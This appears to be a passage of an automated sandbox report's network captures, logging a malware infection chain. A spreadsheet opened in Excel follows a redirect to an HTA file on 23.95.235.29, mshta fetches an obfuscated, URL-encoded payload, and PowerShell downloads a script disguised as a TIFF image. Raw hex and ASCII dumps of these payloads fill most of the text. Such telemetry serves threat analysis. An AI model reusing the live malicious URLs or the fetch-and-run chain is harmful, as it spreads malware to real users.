                                                                Dec 13, 2024 17:48:08.070754051 CET1236INData Raw: 32 35 25 33 30 25 36 31 25 32 35 25 33 30 25 36 34 25 32 35 25 33 30 25 36 32 25 32 35 25 33 30 25 36 35 25 32 35 25 33 30 25 36 32 25 32 35 25 33 30 25 36 32 25 32 35 25 33 30 25 36 35 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 35 25 32
                                                                Data Ascii: 25%30%61%25%30%64%25%30%62%25%30%65%25%30%62%25%30%62%25%30%65%25%30%39%25%30%35%25%30%64%25%30%62%25%30%61%25%30%61%25%30%61%25%30%64%25%30%62%25%30%65%25%30%62%25%30%62%25%30%65%25%30%39%25%30%35%25%30%64%25%30%62%25%30%61%25%30%61%25%30%61%
                                                                Dec 13, 2024 17:48:08.070770025 CET1236INData Raw: 33 30 25 33 39 25 32 35 25 33 30 25 33 35 25 32 35 25 33 30 25 36 34 25 32 35 25 33 30 25 36 32 25 32 35 25 33 30 25 36 31 25 32 35 25 33 30 25 36 31 25 32 35 25 33 30 25 36 31 25 32 35 25 33 30 25 36 34 25 32 35 25 33 30 25 36 32 25 32 35 25 33
                                                                Data Ascii: 30%39%25%30%35%25%30%64%25%30%62%25%30%61%25%30%61%25%30%61%25%30%64%25%30%62%25%30%65%25%30%62%25%30%62%25%30%65%25%30%39%25%30%35%25%30%64%25%30%62%25%30%61%25%30%61%25%30%61%25%30%64%25%30%62%25%30%65%25%30%62%25%30%62%25%30%65%25%30%39%25%
                                                                Dec 13, 2024 17:48:08.070776939 CET1236INData Raw: 36 34 25 32 35 25 33 30 25 36 32 25 32 35 25 33 30 25 36 35 25 32 35 25 33 30 25 36 32 25 32 35 25 33 30 25 36 32 25 32 35 25 33 30 25 36 35 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 35 25 32 35 25 33 30 25 36 34 25 32 35 25 33 30 25 36
                                                                Data Ascii: 64%25%30%62%25%30%65%25%30%62%25%30%62%25%30%65%25%30%39%25%30%35%25%30%64%25%30%62%25%30%61%25%30%61%25%30%61%25%30%64%25%30%62%25%30%65%25%30%62%25%30%62%25%30%65%25%30%39%25%30%35%25%30%64%25%30%62%25%30%61%25%30%61%25%30%61%25%30%64%25%30%
                                                                Dec 13, 2024 17:48:08.190907001 CET1236INData Raw: 32 35 25 33 30 25 36 34 25 32 35 25 33 30 25 36 32 25 32 35 25 33 30 25 36 31 25 32 35 25 33 30 25 36 31 25 32 35 25 33 30 25 36 31 25 32 35 25 33 30 25 36 34 25 32 35 25 33 30 25 36 32 25 32 35 25 33 30 25 36 35 25 32 35 25 33 30 25 36 32 25 32
                                                                Data Ascii: 25%30%64%25%30%62%25%30%61%25%30%61%25%30%61%25%30%64%25%30%62%25%30%65%25%30%62%25%30%62%25%30%65%25%30%39%25%34%66%25%37%35%25%37%35%25%35%39%25%34%38%25%36%66%25%35%31%25%35%32%25%36%36%25%37%35%25%35%61%25%35%35%25%36%61%25%36%33%25%34%35%


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1192.168.2.224916623.95.235.29803580C:\Windows\System32\mshta.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 13, 2024 17:48:12.752082109 CET466OUTGET /118/sup/greatnicefeatureswithsupercodebnaturalthingsinlineforgiven.hta HTTP/1.1
                                                                Accept: */*
                                                                Accept-Language: fr-FR
                                                                UA-CPU: AMD64
                                                                Accept-Encoding: gzip, deflate
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                Range: bytes=8896-
                                                                Connection: Keep-Alive
                                                                Host: 23.95.235.29
                                                                If-Range: "23f26-6291fccf92813"
                                                                Dec 13, 2024 17:48:13.915497065 CET1236INHTTP/1.1 206 Partial Content
                                                                Date: Fri, 13 Dec 2024 16:48:13 GMT
                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                Last-Modified: Fri, 13 Dec 2024 05:06:59 GMT
                                                                ETag: "23f26-6291fccf92813"
                                                                Accept-Ranges: bytes
                                                                Content-Length: 138342
                                                                Content-Range: bytes 8896-147237/147238
                                                                Keep-Alive: timeout=5, max=100
                                                                Connection: Keep-Alive
                                                                Content-Type: application/hta
                                                                Data Raw: 36 32 25 32 35 25 33 30 25 36 31 25 32 35 25 33 30 25 36 31 25 32 35 25 33 30 25 36 31 25 32 35 25 33 30 25 36 34 25 32 35 25 33 30 25 36 32 25 32 35 25 33 30 25 36 35 25 32 35 25 33 30 25 36 32 25 32 35 25 33 30 25 36 32 25 32 35 25 33 30 25 36 35 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 35 25 32 35 25 33 30 25 36 34 25 32 35 25 33 30 25 36 32 25 32 35 25 33 30 25 36 31 25 32 35 25 33 30 25 36 31 25 32 35 25 33 30 25 36 31 25 32 35 25 33 30 25 36 34 25 32 35 25 33 30 25 36 32 25 32 35 25 33 30 25 36 35 25 32 35 25 33 30 25 36 32 25 32 35 25 33 30 25 36 32 25 32 35 25 33 30 25 36 35 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 35 25 32 35 25 33 30 25 36 34 25 32 35 25 33 30 25 36 32 25 32 35 25 33 30 25 36 31 25 32 35 25 33 30 25 36 31 25 32 35 25 33 30 25 36 31 25 32 35 25 33 30 25 36 34 25 32 35 25 33 30 25 36 32 25 32 35 25 33 30 25 36 35 25 32 35 25 33 30 25 36 32 25 32 35 25 33 30 25 36 32 25 32 35 25 33 30 25 36 35 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 35 25 32 35 [TRUNCATED]
                                                                Data Ascii: 62%25%30%61%25%30%61%25%30%61%25%30%64%25%30%62%25%30%65%25%30%62%25%30%62%25%30%65%25%30%39%25%30%35%25%30%64%25%30%62%25%30%61%25%30%61%25%30%61%25%30%64%25%30%62%25%30%65%25%30%62%25%30%62%25%30%65%25%30%39%25%30%35%25%30%64%25%30%62%25%30%61%25%30%61%25%30%61%25%30%64%25%30%62%25%30%65%25%30%62%25%30%62%25%30%65%25%30%39%25%30%35%25%30%64%25%30%62%25%30%61%25%30%61%25%30%61%25%30%64%25%30%62%25%30%65%25%30%62%25%30%62%25%30%65%25%30%39%25%30%35%25%30%64%25%30%62%25%30%61%25%30%61%25%30%61%25%30%64%25%30%62%25%30%65%25%30%62%25%30%62%25%30%65%25%30%39%25%30%35%25%30%64%25%30%62%25%30%61%25%30%61%25%30%61%25%30%64%25%30%62%25%30%65%25%30%62%25%30%62%25%30%65%25%30%39%25%30%35%25%30%64%25%30%62%25%30%61%25%30%61%25%30%61%25%30%64%25%30%62%25%30%65%25%30%62%25%30%62%25%30%65%25%30%39%25%30%35%25%30%64%25%30%62%25%30%61%25%30%61%25%30%61%25%30%64%25%3
                                                                Dec 13, 2024 17:48:13.915549040 CET1236INData Raw: 30 25 36 32 25 32 35 25 33 30 25 36 35 25 32 35 25 33 30 25 36 32 25 32 35 25 33 30 25 36 32 25 32 35 25 33 30 25 36 35 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 35 25 32 35 25 33 30 25 36 34 25 32 35 25 33 30 25 36 32 25 32 35 25 33 30
                                                                Data Ascii: 0%62%25%30%65%25%30%62%25%30%62%25%30%65%25%30%39%25%30%35%25%30%64%25%30%62%25%30%61%25%30%61%25%30%61%25%30%64%25%30%62%25%30%65%25%30%62%25%30%62%25%30%65%25%30%39%25%30%35%25%30%64%25%30%62%25%30%61%25%30%61%25%30%61%25%30%64%25%30%62%25%3
                                                                Dec 13, 2024 17:48:13.915563107 CET1236INData Raw: 34 25 32 35 25 33 30 25 36 32 25 32 35 25 33 30 25 36 31 25 32 35 25 33 30 25 36 31 25 32 35 25 33 30 25 36 31 25 32 35 25 33 30 25 36 34 25 32 35 25 33 30 25 36 32 25 32 35 25 33 30 25 36 35 25 32 35 25 33 30 25 36 32 25 32 35 25 33 30 25 36 32
                                                                Data Ascii: 4%25%30%62%25%30%61%25%30%61%25%30%61%25%30%64%25%30%62%25%30%65%25%30%62%25%30%62%25%30%65%25%30%39%25%30%35%25%30%64%25%30%62%25%30%61%25%30%61%25%30%61%25%30%64%25%30%62%25%30%65%25%30%62%25%30%62%25%30%65%25%30%39%25%30%35%25%30%64%25%30%6
                                                                Dec 13, 2024 17:48:13.915656090 CET1236INData Raw: 35 25 33 37 25 33 35 25 32 35 25 33 35 25 36 31 25 32 35 25 33 35 25 33 35 25 32 35 25 33 36 25 36 31 25 32 35 25 33 36 25 33 33 25 32 35 25 33 34 25 33 35 25 32 35 25 33 36 25 36 35 25 32 35 25 33 35 25 36 35 25 32 35 25 33 35 25 36 32 25 32 35
                                                                Data Ascii: 5%37%35%25%35%61%25%35%35%25%36%61%25%36%33%25%34%35%25%36%65%25%35%65%25%35%62%25%37%63%25%37%38%25%36%62%25%35%65%25%36%61%25%36%38%25%36%39%25%36%66%25%35%30%25%34%64%25%35%63%25%37%36%25%36%38%25%35%30%25%35%64%25%37%63%25%35%38%25%37%34%2
                                                                Dec 13, 2024 17:48:13.915669918 CET1236INData Raw: 34 25 36 36 25 32 35 25 33 34 25 33 38 25 32 35 25 33 35 25 36 32 25 32 35 25 33 36 25 33 39 25 32 35 25 33 36 25 36 32 25 32 35 25 33 35 25 36 35 25 32 35 25 33 36 25 33 38 25 32 35 25 33 34 25 36 35 25 32 35 25 33 34 25 33 34 25 32 35 25 33 34
                                                                Data Ascii: 4%66%25%34%38%25%35%62%25%36%39%25%36%62%25%35%65%25%36%38%25%34%65%25%34%34%25%34%66%25%36%31%25%34%35%25%36%65%25%37%66%25%36%63%25%35%66%25%35%34%25%35%31%25%35%39%25%36%63%25%34%65%25%37%39%25%35%39%25%35%33%25%37%33%25%36%63%25%35%37%25%3
                                                                Dec 13, 2024 17:48:13.915682077 CET1236INData Raw: 32 25 32 35 25 33 30 25 36 35 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 35 25 32 35 25 33 30 25 36 34 25 32 35 25 33 30 25 36 32 25 32 35 25 33 30 25 36 31 25 32 35 25 33 30 25 36 31 25 32 35 25 33 30 25 36 31 25 32 35 25 33 30 25 36 34
                                                                Data Ascii: 2%25%30%65%25%30%39%25%30%35%25%30%64%25%30%62%25%30%61%25%30%61%25%30%61%25%30%64%25%30%62%25%30%65%25%30%62%25%30%62%25%30%65%25%30%39%25%30%35%25%30%64%25%30%62%25%30%61%25%30%61%25%30%61%25%30%64%25%30%62%25%30%65%25%30%62%25%30%62%25%30%6
                                                                Dec 13, 2024 17:48:13.915695906 CET1236INData Raw: 35 25 33 30 25 36 31 25 32 35 25 33 30 25 36 34 25 32 35 25 33 30 25 36 32 25 32 35 25 33 30 25 36 35 25 32 35 25 33 30 25 36 32 25 32 35 25 33 30 25 36 32 25 32 35 25 33 30 25 36 35 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 35 25 32 35
                                                                Data Ascii: 5%30%61%25%30%64%25%30%62%25%30%65%25%30%62%25%30%62%25%30%65%25%30%39%25%30%35%25%30%64%25%30%62%25%30%61%25%30%61%25%30%61%25%33%65%25%30%62%25%30%65%25%30%62%25%30%62%25%30%65%25%30%39%25%30%35%25%30%64%25%30%62%25%30%61%25%30%61%25%30%61%2
                                                                Dec 13, 2024 17:48:13.915900946 CET1236INData Raw: 30 25 33 39 25 32 35 25 33 30 25 33 35 25 32 35 25 33 30 25 36 34 25 32 35 25 33 30 25 36 32 25 32 35 25 33 30 25 36 31 25 32 35 25 33 30 25 36 31 25 32 35 25 33 30 25 36 31 25 32 35 25 33 30 25 36 34 25 32 35 25 33 30 25 36 32 25 32 35 25 33 30
                                                                Data Ascii: 0%39%25%30%35%25%30%64%25%30%62%25%30%61%25%30%61%25%30%61%25%30%64%25%30%62%25%30%65%25%30%62%25%30%62%25%30%65%25%30%39%25%30%35%25%30%64%25%30%62%25%30%61%25%30%61%25%30%61%25%30%64%25%30%62%25%30%65%25%30%62%25%30%62%25%30%65%25%30%39%25%3
                                                                Dec 13, 2024 17:48:13.915915012 CET1236INData Raw: 34 25 32 35 25 33 30 25 36 32 25 32 35 25 33 30 25 36 35 25 32 35 25 33 30 25 36 32 25 32 35 25 33 30 25 36 32 25 32 35 25 33 30 25 36 35 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 35 25 32 35 25 33 30 25 36 34 25 32 35 25 33 30 25 36 32
                                                                Data Ascii: 4%25%30%62%25%30%65%25%30%62%25%30%62%25%30%65%25%30%39%25%30%35%25%30%64%25%30%62%25%30%61%25%30%61%25%30%61%25%30%64%25%30%62%25%30%65%25%30%62%25%30%62%25%30%65%25%30%39%25%30%35%25%30%64%25%30%62%25%30%61%25%30%61%25%30%61%25%30%64%25%30%6
                                                                Dec 13, 2024 17:48:13.915998936 CET1236INData Raw: 35 25 33 30 25 36 34 25 32 35 25 33 30 25 36 32 25 32 35 25 33 30 25 36 31 25 32 35 25 33 30 25 36 31 25 32 35 25 33 30 25 36 31 25 32 35 25 33 30 25 36 34 25 32 35 25 33 30 25 36 32 25 32 35 25 33 30 25 36 35 25 32 35 25 33 30 25 36 32 25 32 35
                                                                Data Ascii: 5%30%64%25%30%62%25%30%61%25%30%61%25%30%61%25%30%64%25%30%62%25%30%65%25%30%62%25%30%62%25%30%65%25%30%39%25%30%35%25%30%64%25%30%62%25%30%61%25%30%61%25%30%61%25%30%64%25%30%62%25%30%65%25%30%62%25%30%62%25%30%65%25%30%39%25%30%35%25%30%64%2
                                                                Dec 13, 2024 17:48:14.038347960 CET1236INData Raw: 34 25 36 32 25 32 35 25 33 35 25 33 37 25 32 35 25 33 34 25 33 30 25 32 35 25 33 34 25 36 34 25 32 35 25 33 37 25 36 33 25 32 35 25 33 35 25 33 32 25 32 35 25 33 34 25 33 39 25 32 35 25 33 36 25 33 31 25 32 35 25 33 35 25 33 33 25 32 35 25 33 36
                                                                Data Ascii: 4%62%25%35%37%25%34%30%25%34%64%25%37%63%25%35%32%25%34%39%25%36%31%25%35%33%25%36%64%25%35%36%25%34%63%25%36%38%25%34%63%25%35%64%25%37%66%25%37%30%25%35%37%25%36%64%25%34%39%25%34%38%25%35%36%25%35%36%25%34%38%25%34%63%25%37%35%25%37%33%25%3


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                2192.168.2.224916723.95.235.29803736C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 13, 2024 17:48:19.396975994 CET376OUTGET /118/freesizedressfornaturalbeautyinthiscaseforyougood.tIF HTTP/1.1
                                                                Accept: */*
                                                                UA-CPU: AMD64
                                                                Accept-Encoding: gzip, deflate
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                Host: 23.95.235.29
                                                                Connection: Keep-Alive
                                                                Dec 13, 2024 17:48:20.505322933 CET1236INHTTP/1.1 200 OK
                                                                Date: Fri, 13 Dec 2024 16:48:20 GMT
                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                Last-Modified: Fri, 13 Dec 2024 04:59:49 GMT
                                                                ETag: "25996-6291fb3509830"
                                                                Accept-Ranges: bytes
                                                                Content-Length: 154006
                                                                Keep-Alive: timeout=5, max=100
                                                                Connection: Keep-Alive
                                                                Content-Type: image/tiff
                                                                Data Raw: ff fe 0d 00 0a 00 20 00 20 00 20 00 20 00 0d 00 0a 00 42 00 5a 00 69 00 57 00 4b 00 65 00 6c 00 4c 00 71 00 4c 00 62 00 4c 00 71 00 61 00 50 00 20 00 3d 00 20 00 22 00 41 00 50 00 4e 00 43 00 42 00 6b 00 78 00 47 00 57 00 61 00 63 00 68 00 57 00 6e 00 4c 00 22 00 0d 00 0a 00 74 00 62 00 69 00 62 00 6d 00 61 00 6a 00 71 00 69 00 43 00 63 00 66 00 50 00 57 00 57 00 20 00 3d 00 20 00 22 00 48 00 68 00 64 00 57 00 63 00 43 00 57 00 76 00 57 00 6d 00 4c 00 4e 00 72 00 63 00 57 00 22 00 0d 00 0a 00 66 00 6c 00 42 00 4c 00 57 00 70 00 4b 00 6f 00 48 00 63 00 55 00 69 00 4c 00 4c 00 43 00 20 00 3d 00 20 00 22 00 4c 00 57 00 72 00 7a 00 5a 00 41 00 7a 00 69 00 57 00 57 00 52 00 4c 00 52 00 6c 00 4c 00 22 00 0d 00 0a 00 0d 00 0a 00 66 00 66 00 63 00 65 00 4c 00 51 00 5a 00 7a 00 6d 00 57 00 66 00 71 00 50 00 4c 00 69 00 20 00 3d 00 20 00 22 00 6b 00 4e 00 5a 00 48 00 5a 00 74 00 57 00 63 00 47 00 70 00 5a 00 48 00 54 00 78 00 4a 00 22 00 0d 00 0a 00 63 00 66 00 47 00 4b 00 68 00 5a 00 43 00 65 00 4c 00 68 00 [TRUNCATED]
                                                                Data Ascii: BZiWKelLqLbLqaP = "APNCBkxGWachWnL"tbibmajqiCcfPWW = "HhdWcCWvWmLNrcW"flBLWpKoHcUiLLC = "LWrzZAziWWRLRlL"ffceLQZzmWfqPLi = "kNZHZtWcGpZHTxJ"cfGKhZCeLhmZoKu = "WQuQvLLQlWpcdPB"OWaeHNJczvKaLOK = "plnhIPRjOaHnfbo"eAtHKnAKUSOWPiW = "iuGPBnqcGlWcBLp"vcBNZdnLApickjU = "KUhLKcKjKuilqrL"POzUzoGIKLiGlnc = "ezpaofhlKLcZPWW"ILUlbzWZcKWmkeb = "WAkaLcWHzUpbiuv"AcipZlLigeKceUn = "RGRToouUitRZplU"WzWNkTLoZpmrWoW = "ofKcxqCliSjeNAL"GlzZul
                                                                Dec 13, 2024 17:48:20.505343914 CET1236INData Raw: 00 4c 00 54 00 6b 00 69 00 74 00 69 00 47 00 41 00 51 00 20 00 3d 00 20 00 22 00 57 00 70 00 55 00 55 00 66 00 69 00 63 00 64 00 66 00 6c 00 6b 00 57 00 57 00 7a 00 69 00 22 00 0d 00 0a 00 4b 00 6e 00 4b 00 70 00 54 00 4c 00 66 00 5a 00 57 00 6d
                                                                Data Ascii: LTkitiGAQ = "WpUUficdflkWWzi"KnKpTLfZWmaeUiz = "KLoOLqKfiLoZkZi"iaioWxccALLeqIL = "gGLPbRWGOoLzczK"RGPkukGoibkaKB
                                                                Dec 13, 2024 17:48:20.505363941 CET448INData Raw: 00 69 00 42 00 4c 00 55 00 4f 00 69 00 22 00 0d 00 0a 00 62 00 6b 00 49 00 5a 00 4c 00 42 00 55 00 6d 00 4c 00 7a 00 70 00 6e 00 71 00 5a 00 6d 00 20 00 3d 00 20 00 22 00 50 00 4c 00 66 00 70 00 4e 00 57 00 49 00 6c 00 70 00 62 00 6d 00 41 00 57
                                                                Data Ascii: iBLUOi"bkIZLBUmLzpnqZm = "PLfpNWIlpbmAWKR"oAtASBchLNGAiim = "hStkvnGGrmUmndo"kbWRLpWTpqeIegt = "BNLcWWWKiWqZZLk"h
                                                                Dec 13, 2024 17:48:20.505378008 CET1236INData Raw: 00 6e 00 71 00 4c 00 4e 00 63 00 47 00 22 00 0d 00 0a 00 51 00 6c 00 57 00 50 00 6d 00 70 00 57 00 4c 00 63 00 71 00 6b 00 6d 00 4b 00 42 00 6f 00 20 00 3d 00 20 00 22 00 51 00 55 00 66 00 64 00 5a 00 47 00 50 00 6d 00 6b 00 4c 00 7a 00 55 00 63
                                                                Data Ascii: nqLNcG"QlWPmpWLcqkmKBo = "QUfdZGPmkLzUczW"NNjhQLxKGsKqjBW = "kWKkCOodmkdevdL"zbNecAbKofLzjmQ = "AWokWjioioKWWGO"e
                                                                Dec 13, 2024 17:48:20.505393982 CET1236INData Raw: 00 20 00 3d 00 20 00 22 00 63 00 69 00 6c 00 63 00 66 00 6d 00 6b 00 55 00 57 00 57 00 71 00 47 00 43 00 73 00 66 00 22 00 0d 00 0a 00 63 00 57 00 6b 00 69 00 69 00 4c 00 42 00 74 00 72 00 4c 00 76 00 4c 00 68 00 71 00 69 00 20 00 3d 00 20 00 22
                                                                Data Ascii: = "cilcfmkUWWqGCsf"cWkiiLBtrLvLhqi = "HdzcNmsahBLWdvO"aWnPcZcRhSixtkz = "bnKAziAaBLvULdp"AWPKOmxvzAdtLKu = "iJKA
                                                                Dec 13, 2024 17:48:20.505407095 CET1236INData Raw: 00 6b 00 4b 00 57 00 57 00 47 00 63 00 4b 00 50 00 4f 00 57 00 47 00 68 00 6b 00 4b 00 68 00 20 00 3d 00 20 00 22 00 50 00 69 00 6c 00 4c 00 65 00 4b 00 6b 00 41 00 74 00 55 00 41 00 50 00 6e 00 47 00 6b 00 22 00 0d 00 0a 00 4c 00 69 00 43 00 57
                                                                Data Ascii: kKWWGcKPOWGhkKh = "PilLeKkAtUAPnGk"LiCWxGZjLWxBWkL = "skLWJtCoxWKkAjG"KZqxCCicLihklzz = "WZLKxNfLdQgWdmK"KKkOoPGPhk
                                                                Dec 13, 2024 17:48:20.505419970 CET1236INData Raw: 00 57 00 65 00 62 00 55 00 52 00 68 00 41 00 62 00 57 00 4e 00 47 00 6e 00 22 00 0d 00 0a 00 4a 00 62 00 75 00 47 00 4b 00 57 00 6b 00 78 00 6d 00 64 00 66 00 50 00 4c 00 6d 00 47 00 20 00 3d 00 20 00 22 00 54 00 48 00 68 00 55 00 4e 00 57 00 52
                                                                Data Ascii: WebURhAbWNGn"JbuGKWkxmdfPLmG = "THhUNWRbbpziLPR"iqrKIPaIcWiZLCI = "KiafWsoOUikzkpK"RGBWWGLAtLhWpUb = "vuWjGsIWbLGcU
                                                                Dec 13, 2024 17:48:20.505600929 CET1236INData Raw: 00 42 00 66 00 65 00 47 00 4b 00 65 00 20 00 3d 00 20 00 22 00 43 00 63 00 52 00 4b 00 42 00 78 00 47 00 4c 00 70 00 4e 00 47 00 6b 00 4b 00 4b 00 43 00 22 00 0d 00 0a 00 6a 00 66 00 47 00 7a 00 75 00 69 00 53 00 5a 00 43 00 4c 00 70 00 71 00 4e
                                                                Data Ascii: BfeGKe = "CcRKBxGLpNGkKKC"jfGzuiSZCLpqNdN = "KHhuzWQBLBWKWKl"kBCvbozUdGcidWL = "ijbniGHGOepGxnW"WbjUoBgiBzKALnu =
                                                                Dec 13, 2024 17:48:20.505614042 CET1236INData Raw: 00 4c 00 5a 00 4c 00 22 00 0d 00 0a 00 48 00 69 00 63 00 61 00 6e 00 68 00 6f 00 50 00 7a 00 6f 00 6b 00 72 00 57 00 54 00 4c 00 20 00 3d 00 20 00 22 00 63 00 74 00 55 00 4c 00 57 00 55 00 66 00 65 00 4e 00 4c 00 4c 00 75 00 57 00 43 00 68 00 22
                                                                Data Ascii: LZL"HicanhoPzokrWTL = "ctULWUfeNLLuWCh"ceikjktluLWifAx = "BdjKccqbUsqNLht"LUWHAebfnzvGfJN = "mLcicWoRWKWUOGN"WUZd
                                                                Dec 13, 2024 17:48:20.505625963 CET1236INData Raw: 00 3d 00 20 00 22 00 4b 00 75 00 57 00 4c 00 74 00 41 00 5a 00 4c 00 6d 00 68 00 6e 00 71 00 75 00 63 00 66 00 22 00 0d 00 0a 00 73 00 4c 00 4c 00 4f 00 4c 00 67 00 55 00 7a 00 64 00 5a 00 6f 00 57 00 51 00 4f 00 5a 00 20 00 3d 00 20 00 22 00 47
                                                                Data Ascii: = "KuWLtAZLmhnqucf"sLLOLgUzdZoWQOZ = "GihCqLIGmiWlcak"iZdoWJUWpGfCKuA = "LLousReNWhdzSLL"ccTBRLZUWmSmNAo = "LSACjLi
                                                                Dec 13, 2024 17:48:20.753860950 CET1236INData Raw: 00 6e 00 4b 00 47 00 6c 00 69 00 4c 00 57 00 4a 00 65 00 4c 00 62 00 6f 00 20 00 3d 00 20 00 22 00 4b 00 49 00 65 00 57 00 6b 00 69 00 4b 00 69 00 43 00 63 00 47 00 6b 00 72 00 68 00 4a 00 22 00 0d 00 0a 00 47 00 4c 00 4c 00 6d 00 62 00 74 00 47
                                                                Data Ascii: nKGliLWJeLbo = "KIeWkiKiCcGkrhJ"GLLmbtGhmaicLfi = "hdOKWmGZkvPLfIn"nfSOePiniBLcnAp = "GNBcGAlRWiPbfNL"NzhKihhiIGf


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                3192.168.2.224917323.95.235.29802772C:\Windows\System32\mshta.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 13, 2024 17:48:34.579113960 CET501OUTGET /118/sup/greatnicefeatureswithsupercodebnaturalthingsinlineforgiven.hta HTTP/1.1
                                                                Accept: */*
                                                                Accept-Language: fr-FR
                                                                UA-CPU: AMD64
                                                                Accept-Encoding: gzip, deflate
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                If-Modified-Since: Fri, 13 Dec 2024 05:06:59 GMT
                                                                Connection: Keep-Alive
                                                                Host: 23.95.235.29
                                                                If-None-Match: "23f26-6291fccf92813"
                                                                Dec 13, 2024 17:48:35.713968039 CET275INHTTP/1.1 304 Not Modified
                                                                Date: Fri, 13 Dec 2024 16:48:35 GMT
                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                Last-Modified: Fri, 13 Dec 2024 05:06:59 GMT
                                                                ETag: "23f26-6291fccf92813"
                                                                Accept-Ranges: bytes
                                                                Keep-Alive: timeout=5, max=100
                                                                Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                0192.168.2.2249163170.82.173.304433288C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                TimestampBytes transferredDirectionData
                                                                2024-12-13 16:48:05 UTC408OUTGET /VRidcbrtv4?&helium=earsplitting&pasta=verdant&mirror=x-rated&gap=brash&life=fluffy&veranda HTTP/1.1
                                                                Accept: */*
                                                                UA-CPU: AMD64
                                                                Accept-Encoding: gzip, deflate
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                Host: curt.wiz.co
                                                                Connection: Keep-Alive
                                                                2024-12-13 16:48:06 UTC987INHTTP/1.1 302 Found
                                                                Date: Fri, 13 Dec 2024 16:48:06 GMT
                                                                Content-Type: text/plain; charset=utf-8
                                                                Content-Length: 112
                                                                Connection: close
                                                                Set-Cookie: sess=123; path=/; Secure; HttpOnly
                                                                Location: http://23.95.235.29/118/sup/greatnicefeatureswithsupercodebnaturalthingsinlineforgiven.hta
                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                x-ms-middleware-request-id: 00000000-0000-0000-0000-000000000000
                                                                X-DNS-Prefetch-Control: off
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Download-Options: noopen
                                                                X-Content-Type-Options: nosniff
                                                                X-XSS-Protection: 1; mode=block
                                                                Content-Security-Policy: default-src 'self' 'unsafe-inline' ; font-src *;img-src * data:; script-src * 'unsafe-inline' ; style-src * 'unsafe-inline';
                                                                Referrer-Policy: strict-origin
                                                                Permissions-Policy: accelerometer=(self), ambient-light-sensor=(), battery=(self), camera=(self), geolocation=(self), gyroscope=(self), microphone=(self), usb=(self), gamepad=(), speaker-selection=()
                                                                X-GoCache-CacheStatus: BYPASS
                                                                2024-12-13 16:48:06 UTC112INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 32 33 2e 39 35 2e 32 33 35 2e 32 39 2f 31 31 38 2f 73 75 70 2f 67 72 65 61 74 6e 69 63 65 66 65 61 74 75 72 65 73 77 69 74 68 73 75 70 65 72 63 6f 64 65 62 6e 61 74 75 72 61 6c 74 68 69 6e 67 73 69 6e 6c 69 6e 65 66 6f 72 67 69 76 65 6e 2e 68 74 61
                                                                Data Ascii: Found. Redirecting to http://23.95.235.29/118/sup/greatnicefeatureswithsupercodebnaturalthingsinlineforgiven.hta


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1192.168.2.2249165170.82.173.304433580C:\Windows\System32\mshta.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-12-13 16:48:11 UTC432OUTGET /VRidcbrtv4?&helium=earsplitting&pasta=verdant&mirror=x-rated&gap=brash&life=fluffy&veranda HTTP/1.1
                                                                Accept: */*
                                                                Accept-Language: fr-FR
                                                                UA-CPU: AMD64
                                                                Accept-Encoding: gzip, deflate
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                Host: curt.wiz.co
                                                                Connection: Keep-Alive
                                                                2024-12-13 16:48:12 UTC987INHTTP/1.1 302 Found
                                                                Date: Fri, 13 Dec 2024 16:48:12 GMT
                                                                Content-Type: text/plain; charset=utf-8
                                                                Content-Length: 112
                                                                Connection: close
                                                                Set-Cookie: sess=123; path=/; Secure; HttpOnly
                                                                Location: http://23.95.235.29/118/sup/greatnicefeatureswithsupercodebnaturalthingsinlineforgiven.hta
